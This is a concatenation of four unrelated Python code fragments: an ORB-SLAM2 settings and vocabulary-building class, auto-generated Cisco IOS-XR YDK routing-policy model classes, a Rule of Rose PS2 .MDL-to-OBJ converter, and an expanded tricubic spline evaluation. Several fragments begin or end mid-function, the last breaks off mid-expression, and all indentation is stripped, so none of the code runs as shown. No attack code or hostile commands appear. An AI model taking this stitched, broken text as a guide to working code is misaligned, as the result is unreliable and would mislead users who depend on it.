orbslam_settings = {
'Camera': {
# Camera calibration and distortion parameters (OpenCV)
# Most of these get overridden with the camera intrinsics at the start of the run.
'fx': self._intrinsics.fx,
'fy': self._intrinsics.fy,
'cx': self._intrinsics.cx,
'cy': self._intrinsics.cy,
'k1': self._intrinsics.k1,
'k2': self._intrinsics.k2,
'p1': self._intrinsics.p1,
'p2': self._intrinsics.p2,
'k3': self._intrinsics.k3,
'width': self._intrinsics.width,
'height': self._intrinsics.height,
# Camera frames per second
'fps': self._framerate,
# Color order of the images (0: BGR, 1: RGB. It is ignored if images are grayscale)
# All the images in this system will be greyscale anyway
'RGB': 1
},
# Close/Far threshold, in units of the stereo baseline (points deeper than ThDepth * baseline are treated as far points).
'ThDepth': self.depth_threshold,
# Depthmap values factor (all my depth is in meters, rescaling is handled elsewhere)
'DepthMapFactor': 1.0,
'ORBextractor': {
# ORB Extractor: Number of features per image
'nFeatures': self.orb_num_features,
# ORB Extractor: Scale factor between levels in the scale pyramid
'scaleFactor': self.orb_scale_factor,
# ORB Extractor: Number of levels in the scale pyramid
'nLevels': self.orb_num_levels,
# ORB Extractor: Fast threshold
# Image is divided in a grid. At each cell FAST are extracted imposing a minimum response.
# Firstly we impose iniThFAST. If no corners are detected we impose a lower value minThFAST
# You can lower these values if your images have low contrast
'iniThFAST': self.orb_ini_threshold_fast,
'minThFAST': self.orb_min_threshold_fast
},
# Viewer configuration expected by ORB_SLAM2
# Since the viewer is disabled, these values don't matter, but need to exist
'Viewer': {
'KeyFrameSize': 0.05,
'KeyFrameLineWidth': 1,
'GraphLineWidth': 0.9,
'PointSize': 2,
'CameraSize': 0.08,
'CameraLineWidth': 3,
'ViewpointX': 0,
'ViewpointY': -0.7,
'ViewpointZ': -1.8,
'ViewpointF': 500
}
}
if self.mode is SensorMode.STEREO:
if self._stereo_baseline is not None:
# stereo baseline times fx
orbslam_settings['Camera']['bf'] = float(self._stereo_baseline * self._intrinsics.fx)
else:
raise RuntimeError("Cannot save stereo settings without a stereo baseline")
# Choose a new settings file, using mkstemp to avoid collisions
_, self._settings_file = tempfile.mkstemp(
prefix='orb-slam2-settings-{0}-'.format(self.pk if self.pk is not None else 'unregistered'),
suffix='.yaml',
dir=self._temp_folder
)
self._settings_file = Path(self._settings_file)
dump_config(self._settings_file, orbslam_settings)
def remove_settings(self) -> None:
"""
Get rid of the settings file after creating it using save_settings
:return:
"""
if self._settings_file is not None:
if self._settings_file.exists():
self._settings_file.unlink()
self._settings_file = None
def build_vocabulary(self, image_sources: typing.Iterable[ImageSource], output_folder: Path,
force: bool = False, change_threshold: float = 0.6, z_depth: float = 1.0) -> None:
"""
Construct a vocabulary file
:param image_sources: The image sources to use to build the vocabulary.
:param output_folder: A folder to output the vocabulary file to. Get this from the path manager.
:param force: Build even if the file already exists
:param change_threshold: The IoU between successive views that are considered distinct.
Used to reduce the number of duplicate features given to the vocabulary.
:param z_depth: The assumed z-depth when reprojecting image frames to work out overlap.
:return: None
"""
output_filename = None
if self.vocabulary_file is not None and len(self.vocabulary_file) > 0:
# Use the existing filename within whatever folder as the filename
output_filename = self.vocabulary_file.split('/')[-1]
if output_filename is None or len(output_filename) <= 0:
if self.pk is not None:
output_filename = VOCABULARY_FILENAME_TEMPLATE.format(self.pk)
else:
raise ValueError("Could not choose a name for the vocabulary file. Please save the model and try again")
output_path = output_folder / VOCABULARY_FOLDER / output_filename
if force or not output_path.exists():
vocab_builder = VocabularyBuilder(
self.orb_num_features, # Number of ORB features from the detector
self.orb_scale_factor, # Scale factor for the ORB scale pyramid
self.orb_num_levels, # Number of levels in the ORB scale pyramid
31, # Edge threshold, matches patch size
0, # First level
2, # WTA_K=2, that is, use 2 point to determine descriptor elements
1, # ScoreType = ORB::FAST_SCORE
31, # Patch size, matching the constant in OrbExtractor.cc
min(self.orb_ini_threshold_fast, self.orb_min_threshold_fast) # The lower FAST threshold
)
images_added = 0
logging.getLogger(__name__).debug("Building ORB vocab...")
for image_source in image_sources:
current_image = None
for timestamp, image in image_source:
# Make sure successive images are at least a little different
if current_image is None or find_percentage_overlap(current_image, image,
z_depth) < change_threshold:
grey_image = image_utils.convert_to_grey(image.pixels)
vocab_builder.add_image(grey_image)
current_image = image
images_added += 1
if images_added < 10:
raise ValueError("Could not find enough images with threshold {0}".format(change_threshold))
logging.getLogger(__name__).debug(
"Created ORB vocabulary from {0} images, saving to {1}...".format(images_added, output_path))
output_path.parent.mkdir(parents=True, exist_ok=True)
# Construct the vocabulary file
vocab_builder.build_vocabulary(
str(output_path),
branchingFactor=int(self.vocabulary_branching_factor),
numLevels=int(self.vocabulary_depth),
seed=int(self.vocabulary_seed)
)
# Update the stored vocabulary file to point to the newly build file.
self.vocabulary_file = VOCABULARY_FOLDER + '/' + output_filename
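    # Path-handling sketch (illustrative): with output_folder = Path('/data') and
    # VOCABULARY_FOLDER = 'vocabularies' (value assumed), the vocabulary is written to
    # /data/vocabularies/<output_filename>, while self.vocabulary_file stores only the
    # relative 'vocabularies/<output_filename>' so it can be resolved against whatever
    # output folder the path manager provides later.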
def _stop_subprocess(self, terminate: bool = False, timeout: float = 5.0) -> None:
"""
Stop the subprocess, by any means necessary.
:param terminate: Whether to send SIGTERM before trying to join; do this when you know the subprocess has crashed.
:return:
"""
if self._child_process:
if terminate:
self._child_process.terminate()
self._child_process.join(timeout=timeout)
if not terminate and self._child_process.is_alive():
# we didn't terminate before, but we've been unable to join, send sig-term
self._child_process.terminate()
self._child_process.join(timeout=timeout)
if self._child_process.is_alive():
# We've timed out after | |
set is
attached
.. attribute:: binding
bindings list
**type**\: list of :py:class:`Binding <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached.Binding>`
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.binding = YList()
self.binding.parent = self
self.binding.name = 'binding'
class Binding(object):
"""
bindings list
.. attribute:: af_name
Address Family Identifier
**type**\: :py:class:`AddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AddressFamilyEnum>`
.. attribute:: aggregate_network_address
Aggregate IP address or Network IP Address in IPv4 or IPv6 Format
**type**\: str
.. attribute:: area_id
OSPF Area ID in Decimal Integer Format
**type**\: str
.. attribute:: attach_point
Name of attach point where policy is attached
**type**\: str
.. attribute:: attached_policy
The attached policy that (maybe indirectly) uses the object in question
**type**\: str
.. attribute:: direction
Direction In or Out
**type**\: :py:class:`AttachPointDirectionEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AttachPointDirectionEnum>`
.. attribute:: group
Neighbor Group
**type**\: :py:class:`GroupEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.GroupEnum>`
.. attribute:: group_name
Neighbor Group Name
**type**\: str
.. attribute:: instance
Instance
**type**\: str
.. attribute:: interface_name
Interface Name
**type**\: str
.. attribute:: neighbor_address
Neighbor IP Address
**type**\: str
.. attribute:: neighbor_af_name
Neighbor IP Address Family
**type**\: :py:class:`AddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.AddressFamilyEnum>`
.. attribute:: propogate_from
ISIS Propogate From Level
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: propogate_to
ISIS Propogate To Level
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: proto_instance
Protocol instance
**type**\: str
.. attribute:: protocol
Protocol to which policy attached
**type**\: str
.. attribute:: route_policy_name
Policy that uses object in question
**type**\: str
.. attribute:: saf_name
Subsequent Address Family Identifier
**type**\: :py:class:`SubAddressFamilyEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.SubAddressFamilyEnum>`
.. attribute:: source_protocol
Source Protocol to redistribute, Source Protocol can be one of the following values {all, connected, local, static, bgp, rip, isis, ospf, ospfv3, eigrp, unknown }
**type**\: str
.. attribute:: vrf_name
VRF name
**type**\: str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.af_name = None
self.aggregate_network_address = None
self.area_id = None
self.attach_point = None
self.attached_policy = None
self.direction = None
self.group = None
self.group_name = None
self.instance = None
self.interface_name = None
self.neighbor_address = None
self.neighbor_af_name = None
self.propogate_from = None
self.propogate_to = None
self.proto_instance = None
self.protocol = None
self.route_policy_name = None
self.saf_name = None
self.source_protocol = None
self.vrf_name = None
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:binding'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.aggregate_network_address is not None:
return True
if self.area_id is not None:
return True
if self.attach_point is not None:
return True
if self.attached_policy is not None:
return True
if self.direction is not None:
return True
if self.group is not None:
return True
if self.group_name is not None:
return True
if self.instance is not None:
return True
if self.interface_name is not None:
return True
if self.neighbor_address is not None:
return True
if self.neighbor_af_name is not None:
return True
if self.propogate_from is not None:
return True
if self.propogate_to is not None:
return True
if self.proto_instance is not None:
return True
if self.protocol is not None:
return True
if self.route_policy_name is not None:
return True
if self.saf_name is not None:
return True
if self.source_protocol is not None:
return True
if self.vrf_name is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached.Binding']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-policy-repository-oper:attached'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.binding is not None:
for child_ref in self.binding:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set.Attached']['meta_info']
@property
def _common_path(self):
if self.set_name is None:
raise YPYModelError('Key property set_name is None')
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:set[Cisco-IOS-XR-policy-repository-oper:set-name = ' + str(self.set_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.set_name is not None:
return True
if self.attached is not None and self.attached._has_data():
return True
if self.used_by is not None and self.used_by._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_.Set']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:sets'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.set is not None:
for child_ref in self.set:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Sets_']['meta_info']
class Unused(object):
"""
All objects of a given type that are not
referenced at all
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:unused'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Unused']['meta_info']
class Inactive(object):
"""
All objects of a given type that are not
attached to a protocol
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:inactive'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Inactive']['meta_info']
class Active(object):
"""
All objects of a given type that are attached to
a protocol
.. attribute:: object
Policy objects
**type**\: list of str
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
self.object = YLeafList()
self.object.parent = self
self.object.name = 'object'
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh/Cisco-IOS-XR-policy-repository-oper:active'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.object is not None:
for child in self.object:
if child is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh.Active']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-policy-repository-oper:routing-policy/Cisco-IOS-XR-policy-repository-oper:sets/Cisco-IOS-XR-policy-repository-oper:extended-community-seg-nh'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.active is not None and self.active._has_data():
return True
if self.inactive is not None and self.inactive._has_data():
return True
if self.sets is not None and self.sets._has_data():
return True
if self.unused is not None and self.unused._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_policy_repository_oper as meta
return meta._meta_table['RoutingPolicy.Sets.ExtendedCommunitySegNh']['meta_info']
class ExtendedCommunitySoo(object):
"""
Information about Extended Community SOO sets
.. attribute:: active
All objects of a given type that are attached to a protocol
**type**\: :py:class:`Active <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Active>`
.. attribute:: inactive
All objects of a given type that are not attached to a protocol
**type**\: :py:class:`Inactive <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Inactive>`
.. attribute:: sets
Information about individual sets
**type**\: :py:class:`Sets_ <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Sets_>`
.. attribute:: unused
All objects of a given type that are not referenced at all
**type**\: :py:class:`Unused <ydk.models.cisco_ios_xr.Cisco_IOS_XR_policy_repository_oper.RoutingPolicy.Sets.ExtendedCommunitySoo.Unused>`
"""
_prefix = 'policy-repository-oper'
_revision = '2015-11-09'
def __init__(self):
self.parent = None
| |
# Converts a Rule of Rose (PS2) I3D model file (.MDL) to OBJ.
import argparse
import math
import numpy as np
import os
import sys
import struct
parser = argparse.ArgumentParser(description='''
Converts a Rule of Rose (PS2) I3D model file (.MDL) to OBJ.
''')
def err(msg):
print("Error: {}".format(msg))
sys.exit(1)
def getuint16(b, offs = 0):
return struct.unpack('<H', b[offs:offs+2])[0]
def getnuint16(b, offs, n):
return struct.unpack('<' + 'H'*n, b[offs:offs+2*n])
def getuint32(b, offs = 0):
return struct.unpack('<I', b[offs:offs+4])[0]
def getfloat32(b, offs):
return struct.unpack('<f', b[offs:offs+4])[0]
def getnfloat32(b, offs, n):
return struct.unpack('<' + 'f'*n, b[offs:offs+4*n])
parser.add_argument('mdlpath', help='Input path of .MDL file', nargs=1)
args = parser.parse_args()
if len(args.mdlpath[0]) == 0:
parser.print_usage()
sys.exit(1)
# Extracts a file from an RPK archive with the given index.
def ReadRpkFile(f, index):
f.seek(0)
header = f.read(0x20)
if header[:4] != b'RTPK':
err("Not an RTPK archive!")
numfiles = getuint16(header, 0xE)
if index < 0 or index >= numfiles:
err("File index {} out of range in RTPK archive".format(index))
totalsize = getuint32(header, 0x4)
filesize = 0
fileoffs = 0
if header[0xA] == 0x2: # Offset table only
f.seek(index * 0x4 + 0x20)
fileoffs = getuint32(f.read(4))
if index == numfiles - 1:
filesize = totalsize - fileoffs
else:
filesize = getuint32(f.read(4)) - fileoffs
elif header[0xA] == 0x3: # Size and offset tables
f.seek(index * 0x4 + 0x20)
filesize = getuint32(f.read(4))
f.seek((numfiles + index) * 4 + 0x20)
fileoffs = getuint32(f.read(4))
f.seek(fileoffs)
return f.read(filesize)
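# RTPK header layout as implemented by ReadRpkFile above (derived from the reads in
# this script, not from an official spec):
#   0x00  'RTPK' magic              0x04  uint32 total archive size
#   0x0A  table-type byte           0x0E  uint16 number of files
#   0x20  tables: offsets only (type 0x2), or sizes followed by offsets (type 0x3)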
class Node:
def __init__(self, buf, offs):
self.dataOffs = getuint32(buf, offs)
self.dataType = buf[offs + 0x7] & 0x7F
self.children = []
numChildren = getuint16(buf, offs + 0x4)
firstChildOffs = getuint32(buf, offs + 0x8)
for i in range(numChildren):
self.children.append(Node(buf, firstChildOffs + i * 0x10))
def getChildrenByType(self, dataType):
result = []
for child in self.children:
result += child.getChildrenByType(dataType)
if self.dataType == dataType:
result = [self] + result
return result
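# I3D node records, as parsed above, are 0x10 bytes each:
#   +0x0 uint32 data offset      +0x4 uint16 child count
#   +0x7 type byte (low 7 bits)  +0x8 uint32 offset of the first child record
# Child records are contiguous, so child i lives at firstChildOffs + i * 0x10.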
def parseName(buf, offs):
endOffs = offs
while buf[endOffs] != 0:
endOffs += 1
return buf[offs:endOffs].decode(encoding='ascii')
class SubmeshPiece:
def __init__(self, offs):
self.offs = offs
self.vtx = []
self.vt = []
self.vn = []
self.ind = []
class Submesh:
def __init__(self, offs, materialIndex):
self.offs = offs
self.materialIndex = materialIndex
self.submeshPieces = []
class Mesh:
def __init__(self, offs):
self.offs = offs
self.submeshes = []
class MeshInstance:
def __init__(self, offs, combinedMeshOffs):
self.offs = offs
self.combinedMeshOffs = combinedMeshOffs
self.meshes = []
vumem = [[0, 0, 0, 0] for _ in range(0x1000)] # VU1 memory is 16K bytes
def parseVif(buf, offs):
endoffs = offs + (buf[offs + 0x4] << 4) + 0x10
offs += 0x10
vif_r = [0, 0, 0, 0] # Can I assume this?
vif_c = [1, 1, 1, 1] # Pretty sure I can assume this at least
cl = 1
wl = 1
mask = [0 for _ in range(16)]
def maybe_mask_value(val, index, cycle, use_mask):
if not use_mask or mask[index] == 0b00:
return val
if mask[index + min(cycle, 3) * 4] == 0b01:
return vif_r[index]
if mask[index + min(cycle, 3) * 4] == 0b10:
return vif_c[min(3, cycle)]
return 0
while offs < endoffs:
imm, qwd, cmd = struct.unpack('<HBB', buf[offs:offs+4])
cmd &= 0x7F
offs += 4
if cmd == 0b00000000: # NOP
continue
elif cmd == 0b00000001: # STCYCLE
cl = imm & 0xFF
wl = (imm >> 8) & 0xFF
elif cmd == 0b00110000: # STROW
vif_r = getnfloat32(buf, offs, 4)
offs += 0x10
elif cmd == 0b00110001: # STCOL
vif_c = getnfloat32(buf, offs, 4)
offs += 0x10
elif cmd == 0b00100000: # STMASK
m = getuint32(buf, offs)
mask = [((m >> (i << 1)) & 0x3) for i in range(16)]
offs += 4
elif cmd >> 5 == 0b11: # UNPACK
# NOTE: This has to handle both skipping writes (cl >= wl) and filling writes (cl < wl)!
addr = imm & 0x3FF
vnvl = cmd & 0xF
m = (cmd & 0x10) > 0
j = 0
if vnvl == 0b0000: # S-32
width = 4
for i in range(qwd):
val = 0
if cl >= wl or (i % wl) < cl:
val = getfloat32(buf, width * j + offs)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val, 0, i, m),
maybe_mask_value(val, 1, i, m),
maybe_mask_value(val, 2, i, m),
maybe_mask_value(val, 3, i, m),
]
elif vnvl == 0b0100: # V2-32
width = 8
for i in range(qwd):
val = [0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 2)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(0, 2, i, m),
maybe_mask_value(0, 3, i, m),
]
elif vnvl == 0b1000: # V3-32
width = 12
for i in range(qwd):
val = [0, 0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 3)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(val[2], 2, i, m),
maybe_mask_value(0, 3, i, m),
]
elif vnvl == 0b1100: # V4-32
width = 16
for i in range(qwd):
val = [0, 0, 0, 0]
if cl >= wl or (i % wl) < cl:
val = getnfloat32(buf, width * j + offs, 4)
j += 1
addroffs = cl * (i // wl) + (i % wl) if cl >= wl else 0
vumem[addr + addroffs] = [
maybe_mask_value(val[0], 0, i, m),
maybe_mask_value(val[1], 1, i, m),
maybe_mask_value(val[2], 2, i, m),
maybe_mask_value(val[3], 3, i, m),
]
else:
err('Unsupported unpack vnvl {} at offset {}'.format(hex(vnvl), hex(offs)))
offs += j * width
else:
err('Unrecognized vifcmd {} at offset {}'.format(hex(cmd), hex(offs)))
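# Addressing sketch for the UNPACK handling above (illustrative only): with
# STCYCLE cl=2, wl=1 and a V3-32 UNPACK of qwd=3 vectors to addr=A, every vector
# reads fresh data (cl >= wl) and vector i is written to A + 2*i, i.e. every other
# VU quadword (A, A+2, A+4). With a filling write (cl < wl), only cycles where
# (i % wl) < cl consume input; the remaining cycles keep val at 0 and rely on the
# STMASK/STROW/STCOL state via maybe_mask_value, and this implementation collapses
# all of those writes onto addr itself (addroffs = 0).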
if __name__ == '__main__':
if not os.path.exists(args.mdlpath[0]):
err("Path not found: {}".format(args.mdlpath[0]))
mdlpath = sys.argv[1] if sys.argv[1][0] != '-' else args.mdlpath[0] # Drag-and-drop hack
basepath = os.path.splitext(mdlpath)[0]
basename = os.path.splitext(os.path.basename(mdlpath))[0]
f = open(mdlpath, 'rb')
buf = ReadRpkFile(f, 1)[0x10:]
f.close()
if len(buf) < 0x10:
err('MDL model file is too small! {} bytes'.format(len(buf)))
# Construct the entire node tree recursively.
rootNode = Node(buf, 0)
# Traverse node tree and find all nodes of interest.
materialNodes = rootNode.getChildrenByType(0x25)
combinedMeshNodes = rootNode.getChildrenByType(0x2D)
boneNodes = rootNode.getChildrenByType(0x2A)
# Get all material names. Assume these are the same as texture names.
materialNames = []
for materialNode in materialNodes:
materialOffs = materialNode.children[0].children[0].dataOffs
nameOffs = getuint32(buf, materialOffs + 0x18) + materialOffs
materialNames.append(parseName(buf, nameOffs))
# Parse mesh instances attached to bones.
meshInstances = []
for boneIndex in range(len(boneNodes)):
meshInstanceNodes = boneNodes[boneIndex].getChildrenByType(0x59)
if len(meshInstanceNodes) == 0:
continue
def getTransform(buf, offs, ind):
transformOffs = offs + ind * 0x40
matrix = []
for i in range(4):
matrix += [[getfloat32(buf, transformOffs + i * 0x10 + j * 0x4) for j in range(4)]]
return np.matrix(matrix).transpose()
# Get global transform of current bone.
transformTableOffs = getuint32(buf, rootNode.dataOffs + 0x14) + rootNode.dataOffs
baseTransform = getTransform(buf, transformTableOffs, boneIndex)
for meshInstanceNode in meshInstanceNodes:
# Parse mesh instance data.
boneListOffs = getuint32(buf, meshInstanceNode.dataOffs) + meshInstanceNode.dataOffs
combinedMeshIndex = getuint16(buf, meshInstanceNode.dataOffs + 0x4)
boneListCount = getuint16(buf, meshInstanceNode.dataOffs + 0x6)
boneList = getnuint16(buf, boneListOffs, boneListCount)
combinedMeshNode = combinedMeshNodes[combinedMeshIndex]
meshInstance = MeshInstance(meshInstanceNode.dataOffs, combinedMeshNode.dataOffs)
meshInstances.append(meshInstance)
bindPoseTableOffs = 0
if combinedMeshNode.children[0].dataOffs > 0: # Node type 0x46
# Sadly I can't compute a single transform for the entire combined mesh
# since different meshes may have different relative bind poses.
bindPoseTableOffs = getuint32(buf, combinedMeshNode.children[0].dataOffs) + combinedMeshNode.children[0].dataOffs
meshNodes = combinedMeshNode.getChildrenByType(0x4B)
meshNodes += combinedMeshNode.getChildrenByType(0x4C)
for meshNode in meshNodes:
mesh = Mesh(meshNode.dataOffs)
meshInstance.meshes.append(mesh)
transform = baseTransform
if meshNode.dataType == 0x4C and (buf[meshNode.dataOffs + 0x5] & 0x8) > 0:
# Use global transform of bone assigned to the instance.
boneListIndex = getuint16(buf, meshNode.dataOffs + 0x8)
transform = getTransform(buf, transformTableOffs, boneList[boneListIndex])
for submeshNode in meshNode.getChildrenByType(0x4D):
materialIndex = buf[submeshNode.dataOffs + 0xC]
submesh = Submesh(submeshNode.dataOffs, materialIndex)
mesh.submeshes.append(submesh)
for submeshPieceNode in submeshNode.getChildrenByType(0x56):
submeshPiece = SubmeshPiece(submeshPieceNode.dataOffs)
submesh.submeshPieces.append(submeshPiece)
vertexWeightNodes = submeshPieceNode.getChildrenByType(0x31)
if vertexWeightNodes and bindPoseTableOffs | |
tp2_2
+ Ad[3, 3] * tp2_3
)
values[n] = (
Phi0_0
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 0, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 0, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 0, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 0, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 0, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 0, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 0, i1 + 3, i2 + 3])
)
)
+ Phi0_1
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 1, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 1, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
Phi2_0 * (coefs[i0 + 1, i1 + 2, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 2, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 2, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 2, i2 + 3])
)
+ Phi1_3
* (
Phi2_0 * (coefs[i0 + 1, i1 + 3, i2 + 0])
+ Phi2_1 * (coefs[i0 + 1, i1 + 3, i2 + 1])
+ Phi2_2 * (coefs[i0 + 1, i1 + 3, i2 + 2])
+ Phi2_3 * (coefs[i0 + 1, i1 + 3, i2 + 3])
)
)
+ Phi0_2
* (
Phi1_0
* (
Phi2_0 * (coefs[i0 + 2, i1 + 0, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 0, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 0, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 0, i2 + 3])
)
+ Phi1_1
* (
Phi2_0 * (coefs[i0 + 2, i1 + 1, i2 + 0])
+ Phi2_1 * (coefs[i0 + 2, i1 + 1, i2 + 1])
+ Phi2_2 * (coefs[i0 + 2, i1 + 1, i2 + 2])
+ Phi2_3 * (coefs[i0 + 2, i1 + 1, i2 + 3])
)
+ Phi1_2
* (
